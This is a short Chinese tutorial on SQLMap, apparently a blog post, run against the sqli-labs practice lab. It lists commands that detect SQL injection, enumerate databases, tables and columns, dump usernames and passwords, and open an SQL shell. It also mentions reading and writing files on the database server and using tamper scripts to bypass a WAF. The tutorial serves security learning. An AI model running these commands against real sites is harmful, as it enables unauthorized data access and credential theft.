zoukankan      html  css  js  c++  java
  • SQLMap-02

    0x01SQLMap入门

    1、判断是否有注入
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1"
    

    存在注入

    当注入后面的参数大于2个时,需要添加双引号

    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1&name=tom"
    
    2、判断文本中的http请求是否存在注入点
    sqlmap -r /root/1.txt
    
    3、查询当前用户下的所有数据库
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --dbs
    

    4、获取数据库中的表名
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" -D security --tables
    

    5、获取字段名
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" -D security -T users  --columns
    

    6、获取数据
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" -D security -T users  -C username,password --dump
    

    7、获取所有用户
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --users
    

    8、获取用户密码
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --passwords
    

    9、获取当前网站数据库名
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --current-db
    

    10、获取当前网站数据库的用户名称
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --current-user
    

    0x02 参数

    1、--is-dba 当前用户是否为管理员权限
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --is-dba
    

    2、--roles 列出数据库管理员角色
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --roles
    

    3、--referer 伪造http的referer(level3及以上)
    4、--sql-shell 运行自定义的sql语句
    sqlmap -u "http://192.168.227.1/sqli-labs-master/Less-1/?id=1" --sql-shell
    



    5、--file-read 从数据库服务器重读取文件
    6、--file-write --file-dest 上传文件到数据库服务器中

    0x03 sqlmap自带绕过脚本tamper

    可以使用--tamper参数绕过waf

  • 相关阅读:
    【Electron】Electron 调试
    正则表达式中test、exec、match的区别
    $.extend 与Object.assign的相同与不同
    【Vue】v-for中为什么要用key——diff算法中key作用源码
    【Vue】watch中的deep:true源码实现
    【Vue】vue中computed源码详解
    Network conditions——在不同网络条件下优化性能
    JS中的{}、()、自调用及()=>({})写法含义
    innerHTML和outerHTML区别以及document.querySelector
    SignalR
  • 原文地址:https://www.cnblogs.com/observering/p/13519848.html
Copyright © 2011-2022 走看看